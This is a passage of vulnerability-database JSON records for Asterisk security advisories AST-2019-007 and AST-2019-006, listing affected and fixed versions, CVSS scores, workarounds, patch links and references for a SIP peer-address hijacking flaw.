Asterisk Open Source 16.6.2 \n Asterisk Open Source 17.0.1 \n Certified Asterisk 13.21-cert5 \n\n Patches \n SVN URL Revision \n http://downloads.asterisk.org/pub/security/AST-2019-007-13.diff Asterisk 13 \n http://downloads.asterisk.org/pub/security/AST-2019-007-16.diff Asterisk 16 \n http://downloads.asterisk.org/pub/security/AST-2019-007-17.diff Asterisk 17 \n http://downloads.asterisk.org/pub/security/AST-2019-007-13.21.diff Certified \n Asterisk \n 13.21-cert5 \n\n Links https://issues.asterisk.org/jira/browse/ASTERISK-28580 \n\n Asterisk Project Security Advisories are posted at \n http://www.asterisk.org/security \n \n This document may be superseded by later versions; if so, the latest \n version will be posted at \n http://downloads.digium.com/pub/security/AST-2019-007.pdf and \n http://downloads.digium.com/pub/security/AST-2019-007.html \n\n Revision History\n Date Editor Revisions Made \n October 24, 2019 George Joseph Initial Revision \n November 21, 2019 Ben Ford Added \u201cPosted On\u201d date \n\n Asterisk Project Security Advisory - AST-2019-007\n Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n Permission is hereby granted to distribute and publish this advisory in its\n original, unaltered form",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18610"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "PACKETSTORM",
"id": "155435"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-18610",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "155435",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2020-03060",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4526",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4421",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
}
]
},
"id": "VAR-201911-1169",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
}
],
"trust": 0.948297215
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
}
]
},
"last_update_date": "2024-11-23T21:52:07.630000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisories",
"trust": 0.8,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"title": "AST-2019-007",
"trust": 0.8,
"url": "http://downloads.asterisk.org/pub/security/AST-2019-007.html"
},
{
"title": "[SECURITY] [DLA 2017-1] asterisk security update",
"trust": 0.8,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
},
{
"title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Command Execution Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/196957"
},
{
"title": "Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=104055"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-862",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
},
{
"trust": 1.6,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18610"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18610"
},
{
"trust": 0.6,
"url": "https://seclists.org/fulldisclosure/2019/nov/19"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
},
{
"trust": 0.6,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html second message url unavailable at time of publishing"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/asterisk-privilege-escalation-via-ami-originate-request-30936"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4526/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/155435/asterisk-project-security-advisory-ast-2019-007.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2019-007.pdf"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2019-007.html"
},
{
"trust": 0.1,
"url": "http://www.asterisk.org/security"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007-13.diff"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007-17.diff"
},
{
"trust": 0.1,
"url": "https://issues.asterisk.org/jira/browse/asterisk-28580"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007-16.diff"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007-13.21.diff"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"date": "2019-12-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"date": "2019-11-21T23:30:33",
"db": "PACKETSTORM",
"id": "155435"
},
{
"date": "2019-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1290"
},
{
"date": "2019-11-22T18:15:11.030000",
"db": "NVD",
"id": "CVE-2019-18610"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-21T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"date": "2019-12-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"date": "2022-04-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201911-1290"
},
{
"date": "2024-11-21T04:33:21.593000",
"db": "NVD",
"id": "CVE-2019-18610"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sangoma Asterisk and Certified Asterisk Vulnerabilities related to lack of authentication",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
],
"trust": 0.6
}
}
VAR-201911-0701
Vulnerability from variot - Updated: 2024-11-23 21:52An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer's IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer's name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more. An attacker could use this vulnerability to cause a denial of service.
Nature of Advisory Denial of Service
Susceptibility Remote Unauthenticated Sessions
Severity Minor
Exploits Known No
Reported On October 17, 2019
Reported By Andrey V. T.
Modules Affected channels/chan_sip.c
Resolution Using any other option value for “nat” will prevent the
attack (such as “nat=no” or “nat=force_rport”), but will
need to be tested on an individual basis to ensure that it
works for the user’s deployment. On the fixed versions of
Asterisk, it will no longer set the address of the peer
before authentication is successful when a SIP request comes
in.
Affected Versions
Product Release
Series
Asterisk Open Source 13.x All releases
Asterisk Open Source 16.x All releases
Asterisk Open Source 17.x All releases
Certified Asterisk 13.21 All releases
Corrected In
Product Release
Asterisk Open Source 13.29.2
Asterisk Open Source 16.6.2
Asterisk Open Source 17.0.1
Certified Asterisk 13.21-cert5
Patches
SVN URL Revision
http://downloads.asterisk.org/pub/security/AST-2019-006-13.diff Asterisk 13
http://downloads.asterisk.org/pub/security/AST-2019-006-16.diff Asterisk 16
http://downloads.asterisk.org/pub/security/AST-2019-006-17.diff Asterisk 17
http://downloads.asterisk.org/pub/security/AST-2019-006-13.21.diff Certified
Asterisk
13.21-cert5
Links https://issues.asterisk.org/jira/browse/ASTERISK-28589
Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security
This document may be superseded by later versions; if so, the latest
version will be posted at
http://downloads.digium.com/pub/security/AST-2019-006.pdf and
http://downloads.digium.com/pub/security/AST-2019-006.html
Revision History
Date Editor Revisions Made
October 22, 2019 Ben Ford Initial Revision
November 14, 2019 Ben Ford Corrected and updated fields for
versioning, and added CVE
November 21, 2019 Ben Ford Added “Posted On” date
Asterisk Project Security Advisory - AST-2019-006
Copyright © 2019 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201911-0701",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "13.29.2"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "13.21.0"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "16.0.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "16.6.2"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "17.0.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "13.0.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "17.0.1"
},
{
"model": "gnu/linux",
"scope": null,
"trust": 0.8,
"vendor": "debian",
"version": null
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "13.x"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "16.x"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "17.x"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "13.21"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=13.*"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=16.*"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=17.*"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 0.6,
"vendor": "sangoma",
"version": "13.21"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:debian:debian_linux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:digium:asterisk",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:digium:certified_asterisk",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "bford",
"sources": [
{
"db": "PACKETSTORM",
"id": "155434"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
],
"trust": 0.7
},
"cve": "CVE-2019-18790",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2019-18790",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2020-03059",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"id": "CVE-2019-18790",
"impactScore": 2.5,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2019-18790",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-18790",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-18790",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-03059",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201911-1291",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer\u0027s IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer\u0027s name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more. An attacker could use this vulnerability to cause a denial of service. \n Nature of Advisory Denial of Service \n Susceptibility Remote Unauthenticated Sessions \n Severity Minor \n Exploits Known No \n Reported On October 17, 2019 \n Reported By Andrey V. T. \n Modules Affected channels/chan_sip.c \n\n Resolution Using any other option value for \u201cnat\u201d will prevent the \n attack (such as \u201cnat=no\u201d or \u201cnat=force_rport\u201d), but will \n need to be tested on an individual basis to ensure that it \n works for the user\u2019s deployment. On the fixed versions of \n Asterisk, it will no longer set the address of the peer \n before authentication is successful when a SIP request comes \n in. \n\n Affected Versions \n Product Release \n Series \n Asterisk Open Source 13.x All releases \n Asterisk Open Source 16.x All releases \n Asterisk Open Source 17.x All releases \n Certified Asterisk 13.21 All releases \n\n Corrected In \n Product Release \n Asterisk Open Source 13.29.2 \n Asterisk Open Source 16.6.2 \n Asterisk Open Source 17.0.1 \n Certified Asterisk 13.21-cert5 \n\n Patches \n SVN URL Revision \n http://downloads.asterisk.org/pub/security/AST-2019-006-13.diff Asterisk 13 \n http://downloads.asterisk.org/pub/security/AST-2019-006-16.diff Asterisk 16 \n http://downloads.asterisk.org/pub/security/AST-2019-006-17.diff Asterisk 17 \n http://downloads.asterisk.org/pub/security/AST-2019-006-13.21.diff Certified \n Asterisk \n 13.21-cert5 \n\n Links https://issues.asterisk.org/jira/browse/ASTERISK-28589 \n\n Asterisk Project Security Advisories are posted at \n http://www.asterisk.org/security \n \n This document may be superseded by later versions; if so, the latest \n version will be posted at \n http://downloads.digium.com/pub/security/AST-2019-006.pdf and \n http://downloads.digium.com/pub/security/AST-2019-006.html \n\n Revision History\n Date Editor Revisions Made \n October 22, 2019 Ben Ford Initial Revision \n November 14, 2019 Ben Ford Corrected and updated fields for \n versioning, and added CVE \n November 21, 2019 Ben Ford Added \u201cPosted On\u201d date \n\n Asterisk Project Security Advisory - AST-2019-006\n Copyright \u00a9 2019 Digium, Inc. All Rights Reserved. \n Permission is hereby granted to distribute and publish this advisory in its\n original, unaltered form",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-18790"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "PACKETSTORM",
"id": "155434"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-18790",
"trust": 3.1
},
{
"db": "DLINK",
"id": "SAP10005",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "155434",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2020-03059",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4526",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2019.4421",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "PACKETSTORM",
"id": "155434"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
}
]
},
"id": "VAR-201911-0701",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
}
],
"trust": 0.948297215
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
}
]
},
"last_update_date": "2024-11-23T21:52:07.567000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AST-2019-006",
"trust": 0.8,
"url": "http://downloads.asterisk.org/pub/security/AST-2019-006.html"
},
{
"title": "Security Advisories",
"trust": 0.8,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"title": "[SECURITY] [DLA 2017-1] asterisk security update",
"trust": 0.8,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
},
{
"title": "Patch for Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Denial of Service Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/196959"
},
{
"title": "Sangoma Technologies Asterisk and Sangoma Technologies Certified Asterisk Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=103433"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03059"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1291"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-862",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012588"
},
{
"db": "NVD",
"id": "CVE-2019-18790"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://www.asterisk.org/downloads/security-advisories"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00001.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html"
},
{
"trust": 1.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18790"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-18790"
},
{
"trust": 0.8,
"url": "https://web.archive.org/web/20131208091355/http://securityadvisories.dlink.com/security/publication.aspx?name=sap10005"
},
{
"trust": 0.6,
"url": "https://seclists.org/fulldisclosure/2019/nov/18"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-008.html"
},
{
"trust": 0.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-007.html"
},
{
"trust": 0.6,
"url": "https://lists.debian.org/debian-lts-announce/2019/11/msg00038.html second message url unavailable at time of publishing"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4526/"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/asterisk-information-disclosure-via-sip-peer-ip-address-change-30935"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4421/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/155434/asterisk-project-security-advisory-ast-2019-006.html"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2019-006.html"
},
{
"trust": 0.1,
"url": "https://issues.asterisk.org/jira/browse/asterisk-28589"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006-16.diff"
},
{
"trust": 0.1,
"url": "http://www.asterisk.org/security"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2019-006-13.diff"
},
